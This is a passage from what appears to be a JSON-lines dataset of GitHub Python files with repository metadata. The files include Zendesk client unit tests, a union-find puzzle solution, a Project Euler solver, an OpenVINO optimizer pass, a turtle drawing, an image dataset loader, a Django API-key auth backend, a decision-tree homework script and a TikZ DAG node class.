ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n user = HelpDeskUser(id=1234)\n help_desk_user = zendesk_manager.get_or_create_user(user=user)\n\n assert help_desk_user.id == 1234\n assert help_desk_user.full_name == \"Jim Example\"\n assert help_desk_user.email == \"test@example.com\" # test email /PS-IGNORE\n\n def test_zendesk_get_cached_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user], me=FakeUserResponse(1234))\n help_desk_user = zendesk_manager.get_or_create_user()\n\n assert help_desk_user.id == 1234\n\n def test_error_zendesk_cannot_get_or_create_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n with self.assertRaises(HelpDeskException):\n zendesk_manager.get_or_create_user(user=HelpDeskUser())\n\n def test_zendesk_create_ticket(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n }\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: value\",\n user=user,\n custom_fields=[HelpDeskCustomField(id=123, value=\"some-service-name\")],\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n actualticket = zendesk_manager.create_ticket(ticket=ticket)\n assert actualticket.id == 1\n assert actualticket.subject == ticket.subject\n assert actualticket.custom_fields == [\n HelpDeskCustomField(id=123, value=\"some-service-name\")\n ]\n\n def test_zendesk_create_ticket_with_all_details(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n }\n )\n\n user = HelpDeskUser(id=1234)\n\n comment = HelpDeskComment(\n body=\"This is the initial ticket comment.\",\n public=False,\n )\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: value\",\n user=user,\n tags=[\"tag1\", \"tag2\"],\n external_id=789,\n group_id=456,\n assingee_id=3456,\n comment=comment,\n priority=Priority.NORMAL,\n status=Status.OPEN,\n ticket_type=TicketType.TASK,\n custom_fields=[HelpDeskCustomField(id=123, value=\"some-service-name\")],\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n actualticket = zendesk_manager.create_ticket(ticket=ticket)\n assert actualticket.id == 1\n assert actualticket.subject == ticket.subject\n assert actualticket.tags == ticket.tags\n assert actualticket.external_id == ticket.external_id\n assert actualticket.group_id == ticket.group_id\n assert actualticket.assingee_id == ticket.assingee_id\n assert actualticket.priority == ticket.priority\n assert actualticket.status == ticket.status\n assert actualticket.comment.author_id == 1234\n assert actualticket.comment.body == ticket.comment.body\n assert actualticket.comment.public == ticket.comment.public\n assert actualticket.custom_fields == [\n HelpDeskCustomField(id=123, value=\"some-service-name\")\n ]\n\n def test_zendesk_get_ticket(\n self,\n ):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n subject=\"facesubject\", description=\"fakedescription\", user=user, id=12345\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n actualticket = zendesk_manager.get_ticket(ticket_id=12345)\n assert actualticket.id == ticket.id\n\n def test_error_zendesk_does_not_get_ticket(\n self,\n ):\n\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.get_ticket(ticket_id=54321)\n\n def test_zendesk_add_comment(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n comment = HelpDeskComment(body=\"adding this comment\", author_id=user.id)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(user.id),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n actualticket = zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n assert actualticket.id == 12345\n assert actualticket.subject == \"fakesubject\"\n assert actualticket.comment.body == comment.body\n\n def test_zendesk_add_comment_no_author_id(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n comment = HelpDeskComment(body=\"adding this comment\", public=False)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(1234),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n actualticket = zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n assert actualticket.id == 12345\n assert actualticket.subject == \"fakesubject\"\n assert actualticket.comment.body == comment.body\n assert actualticket.comment.public == comment.public\n assert actualticket.comment.author_id == 1234\n\n def test_error_zendesk_add_comment_not_found(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n comment = HelpDeskComment(body=\"adding this comment\", author_id=user.id)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=98765, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(user.id),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n def test_zendesk_update_ticekt(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: updated\",\n user=user,\n id=12345,\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n updatedticket = zendesk_manager.update_ticket(ticket=ticket)\n\n assert updatedticket.id == ticket.id\n assert updatedticket.description == \"Field: updated\"\n\n def test_error_zendesk_update_ticekt_not_found(self):\n\n email = \"test@example.com\" # test email /PS-IGNORE\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=email,\n subject=\"subject123\",\n description=\"Field: updated\",\n user=user,\n id=54321,\n )\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.update_ticket(ticket=ticket)\n\n def test_zendesk_close_ticket(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_user = FakeUser(\n id=123, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n actualticket = zendesk_manager.close_ticket(ticket_id=12345)\n\n assert actualticket.id == 12345\n assert actualticket.status == Status.CLOSED\n\n def test_error_zendesk_close_ticket_not_found(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.close_ticket(ticket_id=54321)\n","repo_name":"uktrade/help-desk-client","sub_path":"tests/test_zendesk_manager.py","file_name":"test_zendesk_manager.py","file_ext":"py","file_size_in_byte":18152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30872607055","text":"#https://www.acmicpc.net/problem/4195\n'''\nUnion Find 알고리즘\n- 참조 : https://www.youtube.com/watch?v=Ha0w2dJa2Nk\n- 서로소 부분 집합들로 나누어진 원소들의 데이터를 처리하기 위한 자료 구조\n- find 함수: 특정한 원소가 속한 집합이 어떤 집합인지 알려주는 연산\n- union 함수 : 두 개의 원소가 포함된 집합을 하나의 집합으로 합치는 연산\n\n'''\nfrom collections import defaultdict\ndef find(x):\n # x와 parent가 같으면 x 노드를 return, 즉 x가 부모 노드\n if x == parent[x]: return x\n # 계속 중복을 피하기 위해 DP처럼 parent[x]�� 계산된 값을 저장\n # 계속 부모 노트를 찾는 재귀함수\n else:\n p = find(parent[x])\n parent[x] = p\n return parent[x]\n\ndef unite(x,y): \n # 노드 x와 y의 부모 노드 찾기\n x,y = find(x),find(y)\n # x노드로 합친다.\n if x != y: # xy 노드가 같은 부모 노드가 아닌 경우\n parent[y] = x # 노드 x로 합친다\n num[x] += num[y] # 친구 네트워크에 몇 명이 있는지 계산\n'''\n구현 아이디어\n1. 부모 노드를 관리하기 위한 변수를 딕셔너리 타입으로 정의\n - 입력 변수가 문자열로 입력\n2. 딕셔너리 key 값에 입력 데이터가가 없으면 부모 노드로 등록\n3. 입력 데이터 합치기(union )\n'''\nans = []\nT = int(input())\nfor _ in range(T): \n parent, num = defaultdict(int),defaultdict(int)\n F = int(input()) \n for _ in range(F):\n a,b = input().split(\" \")\n # parent key값에 없는 경우 부모 노드로 등록\n if a not in parent:\n parent[a] = a #부모 노드로 설정\n num[a] = 1\n if b not in parent:\n parent[b] = b\n num[b] = 1\n unite(a,b) # a와 b 노드는 친구 관계이므로 합친다\n ans.append(num[find(a)])\nprint(*ans,sep='\\n') \n \n'''\n1\n8\na b\nb c\nd e\ne f\ng h\nh i\na f\nc i\n'''","repo_name":"lgerd999/Baekjoon","sub_path":"01. Graph/5. UnionFind/BJ_G2_친구네트워크_4195.py","file_name":"BJ_G2_친구네트워크_4195.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22951840334","text":"import itertools\nfrom pprint import pprint\n\nfrom pe.misc import divisors, sieve_of_eratosthenes_fast\n\n\ndef solve():\n digits = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # digits = [1, 2, 3, 4]\n all_perms = list(itertools.permutations(digits))\n perms_columns = list(zip(*all_perms))\n\n products = set()\n for i in range(1, 5):\n for j in range(i + 1, 6):\n a = zip(*perms_columns[0:i])\n b = zip(*perms_columns[i:j])\n product = zip(*perms_columns[j:])\n\n a = map(lambda x: list(map(str, x)), a)\n b = map(lambda x: list(map(str, x)), b)\n product = map(lambda x: list(map(str, x)), product)\n\n a = map(lambda x: \"\".join(x), a)\n b = map(lambda x: \"\".join(x), b)\n product = map(lambda x: \"\".join(x), product)\n\n a = map(int, a)\n b = map(int, b)\n product = map(int, product)\n\n actual_products = filter(\n lambda trip: trip[0] == trip[1] * trip[2], zip(product, a, b)\n )\n actual_products = list(zip(*actual_products))\n if len(actual_products) > 0:\n products.update(actual_products[0])\n\n return str(sum(products))\n","repo_name":"tabenmalik/Project-Euler","sub_path":"pe/problems/p032.py","file_name":"p032.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27158564409","text":"import numpy as np\n\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom extensions.ops.elementwise import Mul\nfrom mo.ops.op import Op\nfrom mo.utils.error import Error\n\n\nclass ScaleInput(MiddleReplacementPattern):\n enabled = True\n\n def run_after(self):\n from extensions.middle.pass_separator import PreMiddleStart\n return [PreMiddleStart]\n\n def run_before(self):\n from extensions.middle.AddMeanScaleValues import AddMeanScaleValues\n return [AddMeanScaleValues]\n\n def pattern(self):\n return dict(\n nodes=[\n ('placeholder', dict(kind='op', op='Parameter')),\n ('data', dict(kind='data'))],\n edges=[\n ('placeholder', 'data'),\n ],\n )\n\n def replace_pattern(self, graph: Graph, match: dict):\n scale = graph.graph['cmd_params'].scale\n if scale is None or scale == 1:\n return\n assert (len(match['placeholder'].out_nodes()))\n\n tinput = match['placeholder']\n if not tinput.has_valid('shape'):\n raise Error(\"Node {} has not valid shape attribute\".format(tinput.id))\n\n input_shape = tinput.shape\n toutput = match['data']\n\n # Create Mul node\n value = np.array([1 / scale])\n\n # Disconnect input with data node\n graph.remove_edge(tinput.id, toutput.id)\n\n # Create Mul node\n mul_node = Mul(graph, dict(name=\"Mul1_\"))\n mul_data = Op.create_input_data_node(graph, \"data_mul_scale_\", np.array(value))\n Op.expand_node_shape(mul_data, len(input_shape) - 2 if graph.graph['layout'] == 'NCHW' else 0)\n mul_input = Op.create_data_node(graph, tinput, {'shape': toutput.shape})\n\n mul_node.create_node_with_data(inputs=[mul_input, mul_data], data_nodes=toutput)\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/model_optimizer/extensions/middle/ScaleInput.py","file_name":"ScaleInput.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"22951705835","text":"from turtle import Turtle, Screen\nimport random\n\n# Spirograph\n\ntimmy = Turtle()\nscreen = Screen()\n\ntimmy.shape('turtle')\ntimmy.pensize(3)\ntimmy.speed('fastest')\n\ndef change_color():\n R = random.random()\n B = random.random()\n G = random.random()\n timmy.color(R, G, B)\n\ndef draw_spirograph(size_gap):\n for _ in range(int(360/size_gap)):\n timmy.circle(120)\n change_color()\n timmy.setheading(timmy.heading() + size_gap)\n\ndraw_spirograph(10)\n\nscreen.exitonclick()\n\n","repo_name":"Ankit3794/python-100-days-of-code","sub_path":"day-18-turtle-challenges/turtle_challenge_5.py","file_name":"turtle_challenge_5.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7922987876","text":"import unittest\nimport numpy as np\nimport matplotlib.image as mpimg\nimport os\nfrom Globals import DATA_PATH, SMALL_DATA_PATH\nfrom typing import List, Dict, Tuple\nfrom scipy import ndimage\n\ndef loadImage(fullPath: str, display: bool = False)->np.ndarray:\n \"\"\"\n Load an image and normalizes for training/display\n :param fullPath: Image full path\n :param display: Normalize for display\n :return:\n \"\"\"\n img = mpimg.imread(fullPath)\n if not display:\n img = img.astype(np.float32) / 255.\n return img\n\nclass GeologicalDataset():\n \"\"\"\n A class to menage the dataset of geological images\n \"\"\"\n class Samples:\n \"\"\"\n Holds Numpy arrays of query and reference images , and their joint labels. This data structure scales to the\n input needed for the Siamese network. The query and reference images array are of the same size. Label for each\n pair is 1 if both belong to the same class, and 0 if each belongs to a different\n \"\"\"\n def __init__(self, queries: List[np.array], references: List[np.array], labels: List[np.float32]):\n self.queries = np.array(queries)\n self.references = np.array(references)\n self.labels = np.array(labels)\n\n def __init__(self, path: str, augmentRatio = 0.1):\n \"\"\"\n Initializes GeologicalDataset\n :param path: Path to dataset of queries and reference images\n :param augmentRatio: Ratio of data to augment for training\n \"\"\"\n self.__filepaths: List[str] = [] # List of full paths to images\n self.__labels: List[int] = [] # Labels for each image (rock type)\n self.__labelType: Dict[str, int] = {'andesite': 0, 'gneiss': 1, 'marble': 2, 'quartzite': 3, 'rhyolite': 4,\n 'schist': 5}\n self.__samples = GeologicalDataset.Samples([], [], [])\n\n # Dataset augmentation\n self.__augmentRatio = augmentRatio\n\n # Extracting all image filenames and labels from data path\n pathIter = os.walk(path)\n for root, directories, files in pathIter:\n for file in files:\n filename, fileExtension = os.path.splitext(file)\n if fileExtension != '.jpg':\n continue\n self.__filepaths.append(os.path.join(root, file))\n self.__labels.append(self.__labelType[os.path.split(root)[1]]) # Append image directory as rock type\n\n def initDataset(self, training = True) -> None:\n \"\"\"\n Initializes the dataset by loading all query and reference images defined by the list of predefined paths. For\n training references images are also loaded. For each query, a random image is loaded as its reference. A label\n for the pair is set based on whether the two images belong to the same class or not\n :param training: Indicates whether dataset is initialized for training (for inference there is not need to\n assign reference images)\n \"\"\"\n # Loading images\n images = []\n for filepath in self.__filepaths:\n images.append(loadImage(filepath))\n\n # Creating pairs of queries and reference images, and the proper positive/negative labels\n queries = []\n references = []\n labels = []\n for idx, image in enumerate(images):\n\n # Adding to dataset\n queries.append(image)\n if training:\n idxRefernce = np.random.randint(0, len(images) - 1)\n references.append(images[idxRefernce])\n labels.append(np.float32(1.) if self.__labels[idx] is not self.__labels[idxRefernce] else\n np.float32(0.))\n\n # Augment training dataset (only for training)\n if training and self.__augmentRatio > 0:\n self.__augment(queries, references, labels)\n\n # Initialize training sample dataset\n self.__samples = GeologicalDataset.Samples(queries, references, labels)\n\n def __augment(self, queries: List[np.array], references: List[np.array], labels: List[np.float32]) -> None:\n \"\"\"\n Augments images to training dataset\n :param queries: Basic set of query images\n :param references: Basic set of reference images\n :param labels: Labels of basic set pairs\n \"\"\"\n queriesAugment = []\n referencesAugment = []\n labelsAugment = []\n for query, reference, label in zip(queries, references, labels):\n if np.random.rand(1) >= self.__augmentRatio: # Skip samples not augmented\n continue\n\n # Augmentation type - flip a coin between flipping the image and rotating it\n if np.random.rand(1) >= 0.5: # Flip the image\n queriesAugment.append(np.flip(query, axis=0))\n else: # Rotate the image\n queriesAugment.append(ndimage.rotate(query, 45, mode='mirror', reshape=False))\n referencesAugment.append(reference)\n labelsAugment.append(label)\n\n # Extend basic query, reference, and lavel set by the augmented samples\n queries.extend(queriesAugment)\n references.extend(referencesAugment)\n labels.extend(labelsAugment)\n\n def imageShape(self) -> Tuple[int, int, int]:\n \"\"\"\n Returns a sample image size\n :return: Tuple of H-W-C\n \"\"\"\n shape = self.__samples.queries.shape\n return shape[1], shape[2], shape[3]\n\n def queryFilePaths(self) -> List[str]:\n \"\"\"\n Returns file paths of dataset images\n :return: List of file paths\n \"\"\"\n return self.__filepaths\n\n def queryLabels(self) -> List[int]:\n \"\"\"\n Returns the labels of query images (used for inference)\n :return: List of integers (1-6)\n \"\"\"\n return self.__labels\n\n def queries(self) -> np.array:\n \"\"\"\n Returns query image in the dataset\n :return: Numpy array of images (batch axis = 0)\n \"\"\"\n return self.__samples.queries\n\n def references(self) -> np.array:\n \"\"\"\n Returns reference image in the dataset\n :return: Numpy array of images (batch axis = 0)\n \"\"\"\n return self.__samples.references\n\n def labels(self) -> np.array:\n \"\"\"\n Returns labels of query-reference pairs (1 for a pair that belong to the same class; 0 otherwise)\n :return: Numpy array of labels (batch axis = 0)\n \"\"\"\n return self.__samples.labels\n\nclass MyTestCase(unittest.TestCase):\n def test_load_image(self):\n loadImage(os.path.join(DATA_PATH, 'andesite/0A5NL.jpg'))\n\n def test_display_image(self):\n from matplotlib import pyplot as plt\n img = loadImage(os.path.join(DATA_PATH, 'andesite/0A5NL.jpg'), display=True)\n plt.figure()\n plt.imshow(img)\n plt.show()\n\n def test_dataset(self):\n ds = GeologicalDataset(SMALL_DATA_PATH, augmentRatio=0.5)\n ds.initDataset()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"YanivHollander/Geological-Image-Similarity","sub_path":"DataIO_TF.py","file_name":"DataIO_TF.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34129527319","text":"import logging\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import authentication, exceptions\nfrom smeApi_auth.models import ApiKey\n\n\nUser = get_user_model()\nLOGGER = logging.getLogger(__name__)\n\n\nclass APIKEYBackend(authentication.BaseAuthentication):\n \"\"\"\n Authenticate against api key\n \"\"\"\n\n def authenticate(self, request):\n \"\"\"get the use via api key\"\"\"\n auth = request.META.get('HTTP_AUTHORIZATION', '').split()\n\n if len(auth) != 2:\n raise exceptions.AuthenticationFailed(\n 'Invalid authorization header.')\n\n key = auth[1]\n\n try:\n api_key = ApiKey.objects.get(key=key)\n return (api_key.user, None)\n except ApiKey.DoesNotExist:\n raise exceptions.AuthenticationFailed('Invalid Api Key.')\n\n def get_user(self, user_id):\n try:\n user = User.objects.get(pk=user_id)\n if user.is_active:\n return user\n return None\n except User.DoesNotExist:\n return None\n\n\nclass EmailOrUsernameModelBackend(object):\n \"\"\"\n Simple backend to allow users to log in with their email or\n their username in auth forms\n \"\"\"\n\n def authenticate(self, username=None, password=None):\n if '@' in username:\n kwargs = {'email': username}\n else:\n kwargs = {'username': username}\n try:\n user = User.objects.get(**kwargs)\n if user.check_password(password):\n return user\n return None\n except User.DoesNotExist:\n return None\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n","repo_name":"celelstine/smeApi","sub_path":"config/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6397997141","text":"from sklearn import tree\nfrom scipy.io import arff\nimport numpy as num\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectKBest, mutual_info_classif\nfrom sklearn.model_selection import cross_validate, KFold\n\nfile = open(\"breast.w.arff\", \"r\")\ndata, meta = arff.loadarff(file)\n\ninput = data[meta.names()[:-1]].tolist()\noutput = data[\"Class\"].tolist()\n\nprint(\"5)\")\nprint(\"i.\")\nslFeatures = [[],[]]\nkFol = KFold(n_splits=10, shuffle=True, random_state=47)\nfor i in [1,3,5,9]:\n input_new = SelectKBest(mutual_info_classif, k=i).fit_transform(input,output)\n classifier = tree.DecisionTreeClassifier(criterion='entropy')\n crossRes = cross_validate(classifier, input_new, output, scoring = 'accuracy', cv = kFol, return_train_score=True)\n slFeatures[0].append(num.average(crossRes['test_score']))\n slFeatures[1].append(num.average(crossRes['train_score']))\n\nprint(\"Testing Accuracy:\", slFeatures[0])\nprint(\"Training Accuracy:\", slFeatures[1])\nprint(\"ii.\")\nslDepth=[[],[]]\nfor i in [1,3,5,9]:\n classifier = tree.DecisionTreeClassifier(criterion='entropy', max_depth=i)\n crossRes = cross_validate(classifier, input, output, scoring = 'accuracy', cv = kFol, return_train_score=True)\n slDepth[0].append(num.average(crossRes['test_score']))\n slDepth[1].append(num.average(crossRes['train_score']))\n\nprint(\"Testing Accuracy:\", slDepth[0])\nprint(\"Training Accuracy:\", slDepth[1])\n\nplt.subplot(1,2,1)\nplt.plot([1,3,5,9], slFeatures[0], 'b-', label=\"Test Score\")\nplt.plot([1,3,5,9], slFeatures[1], 'y-', label=\"Train Score\")\nplt.title(\"Selected Features\")\nplt.legend()\nplt.subplot(1,2,2)\nplt.plot([1,3,5,9], slDepth[0], 'b-')\nplt.plot([1,3,5,9], slDepth[1], 'y-')\nplt.title(\"Max Depth\")\nplt.show()\n\n\"\"\" \n#deepth = []\nfor i in [1,3,5,9]:\n classifier = tree.DecisionTreeClassifier(criterion='entropy', max_depth=i)\n cross = cross_val_score(classifier, input, output, scoring = 'accuracy', cv = kFol)\n print(i, \"deepth:\", num.average(cross))\n #deepth += [num.average(cross)] \"\"\"\n\n\"\"\" plt.plot(x,selected, color='r')\nplt.plot(x,deepth, color='g')\nplt.show() \"\"\"\n\"\"\" \nprint(\"training:\")\nx = [1,3,5,9]\nselected = []\n\n\n\nprint(\"ii.\")\ndeepth = []\nfor i in x:\n tree1 = tree.DecisionTreeClassifier(max_depth=i)\n tree1.fit(obs,target)\n cross = tree1.predict(obs)\n correct = 0\n for j in range(len(target)):\n if cross[j] == target[j]:\n correct+=1\n print(i, \"deepth:\", correct/len(target))\n deepth += [correct/len(target)]\n\nplt.plot(x,selected, color='r')\nplt.plot(x,deepth, color='g')\nplt.show() \"\"\"\n\n\n\n\n\n\n\n\n","repo_name":"HojiReiner/Machine-Learning","sub_path":"homework2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22248472444","text":"import sys\n\n\ndef findCombos(linjer):\n numColumns = int(linjer[0].split(\" \")[1])\n piece = int(linjer[0].split(\" \")[0])\n brett = []\n for i in range(5):\n brett.append([])\n\n colored = linjer[1]\n\n for kolonne in range(len(brett)):\n for rad in colored.split(\" \"):\n if int(rad) > kolonne:\n brett[len(brett) - kolonne - 1].append(\"*\")\n else:\n brett[len(brett) - kolonne - 1].append(\"0\")\n\n string = \"\"\n\n for rad in brett:\n for char in rad:\n string += char\n string += \"\\n\"\n print(string)\n\n\n\ndef main():\n linjer = [linje for linje in sys.stdin]\n\n print(findCombos(linjer))\nmain()\n","repo_name":"jakobkhansen/KattisSolutions","sub_path":"Tetris/Tetris.py","file_name":"Tetris.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28248399148","text":"from __future__ import print_function\n\n\nclass DAGSyntaxError(Exception):\n def __init__(self, row, col, msg):\n self.row = row\n self.col = col\n self.msg = msg\n msg = 'Syntax error at (%d, %d): %s' % (row, col, msg)\n super(DAGSyntaxError, self).__init__(msg)\n\n\nclass Node(object):\n def __init__(self, name):\n self.name = name\n self._text = None\n self.parents = [] # list of Node\n self.precursors = [] # list of Node\n self.annotation = ''\n self.row = -1\n self.col = -1\n self.obsolete = False\n self._style = {}\n\n if '^' in name:\n self.name, self.annotation = name.split('^', 1)\n\n if self.annotation in ('O', 'T'):\n self.obsolete = True\n\n def __str__(self):\n return self.name + str(self.row * 10 + self.col)\n\n def __repr__(self):\n return '' % (self.name,)\n\n @property\n def text(self):\n if self._text is None:\n self._text = self.name\n if 'text' in self._style:\n self._text = self._style['text']\n return self._text\n\n def parse(self, nodes, grid, row, col):\n # set the grid location into the node, if not already set\n if self.row == -1:\n self.row = row\n if self.col == -1:\n self.col = col\n if self not in nodes:\n nodes.append(self)\n\n def tikz(self, outfile):\n obs = ''\n if self.obsolete:\n obs = 'obs'\n if self.annotation == 'T':\n obs = 'tmp'\n\n cls = self._style.get('class') or obs + 'changeset'\n\n print(r'\\node[%s] at (%d,%d) (%s) {%s};' % (cls, self.col, -self.row,\n self, self.text),\n file=outfile)\n\n\nclass TransitionText(Node):\n def __init__(self, text):\n super(TransitionText, self).__init__('t')\n self._text = text\n\n def 